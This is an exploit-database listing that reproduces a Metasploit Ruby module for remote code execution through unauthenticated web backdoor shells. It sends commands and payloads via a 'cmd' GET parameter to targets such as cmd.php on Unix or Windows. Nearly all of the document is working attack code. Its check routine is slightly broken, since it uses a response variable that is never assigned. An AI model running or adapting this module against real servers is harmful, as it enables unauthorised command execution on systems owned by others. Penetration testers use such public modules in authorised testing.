Simple Backdoor Shell Remote Code Execution Exploit

2015-10-03T00:00:00
ID 1337DAY-ID-24350
Type zdt
Reporter metasploit
Modified 2015-10-03T00:00:00

Description

This Metasploit module exploits unauthenticated simple web backdoor shells by leveraging the common backdoor shell's CMD parameter to execute commands. The SecLists project of Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells which is categorized under Payloads.

                                        
                                            ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Simple Backdoor Shell Remote Code Execution',
      'Description'    => %q{
        This module exploits unauthenticated simple web backdoor shells by leveraging the
        common backdoor shell's CMD parameter  to execute commands. The SecLists project of
        Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
        which is categorized under Payloads.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jay Turla <@shipcod3>',
        ],
      'References'     =>
        [
          [ 'URL', 'http://resources.infosecinstitute.com/checking-out-backdoor-shells/' ],
          [ 'URL', 'https://github.com/danielmiessler/SecLists/tree/master/Payloads' ] # Most PHP Web Backdoors Listed
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 2000,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['backdoor / Unix', { 'Platform' => 'unix' } ],
          ['backdoor / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Sep 08 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of a backdoor shell', 'cmd.php']),
      ],self.class)
  end

  def check
    test = Rex::Text.rand_text_alpha(8)
    http_send_command(test)
    if res && res.body =~ /#{test}/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def http_send_command(cmd)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path),
      'vars_get' => {
        'cmd' => cmd
      }
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, "Failed to execute the command.")
    end
    res
  end

  def exploit
    http_send_command(payload.encoded)
  end
end

#  0day.today [2018-01-04]  #